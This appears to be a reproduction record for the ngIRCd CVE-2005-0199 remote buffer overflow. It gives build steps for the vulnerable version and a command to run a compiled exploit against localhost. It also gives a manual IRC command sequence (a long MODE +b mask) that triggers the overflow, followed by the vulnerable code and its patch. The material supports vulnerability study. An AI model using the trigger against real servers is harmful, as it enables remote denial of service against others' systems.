CentOS 6.5
wget https://github.com/mudongliang/source-packages/raw/master/CVE-2005-0199/ngircd-rel-0-8-0.zip
tar -xvf ngircd-rel-0-8-0.zip
cd ngircd-rel-0-8-0
./configure
make
sudo make install
Server:
/usr/local/sbin/ngircd -n
Client:
gcc -o exploit 25070.c
./exploit 127.0.0.1 6667 b #TheName
Server:
/usr/local/sbin/ngircd -n
Client:
1. netcat / telnet to a ngirc daemon.
2. type
USER a b c d
NICK b
JOIN \#b
MODE \#b +b aaaa....aa@aaaa...aaa
ngIRCd Remote Buffer Overflow Vulnerability
ngIRCd 0.6/0.7/0.8 - Remote Buffer Overflow
There is a buffer overflow in ngircd, src/ngircd/lists.c; in Lists_MakeMask(). It is caused by an integer underflow in line 317:
at = strchr( Pattern, '@' );
......
if(( at ) && ( ! excl ))
{
/* User fehlt */
*at = '\0'; at++;
317 strlcpy( TheMask, Pattern, sizeof( TheMask ) - strlen( at ) - 4 );
strlcat( TheMask, "!*@", sizeof( TheMask ));
strlcat( TheMask, at, sizeof( TheMask ));
return TheMask;
}
strlen( at ) + 4 can be larger than sizeof( TheMask ).
@@ -392,15 +393,15 @@
if(( at ) && ( ! excl ))
{
- /* User fehlt */
+ /* User name is missing */
*at = '\0'; at++;
- strlcpy( TheMask, Pattern, sizeof( TheMask ) - strlen( at ) - 4 );
+ strlcpy( TheMask, Pattern, sizeof( TheMask ) - 5 );
strlcat( TheMask, "!*@", sizeof( TheMask ));
strlcat( TheMask, at, sizeof( TheMask ));
return TheMask;
}
Details is in the patch link of References Section
ngIRCd Buffer Overflow in Lists_MakeMask() Lets Remote Users Deny Service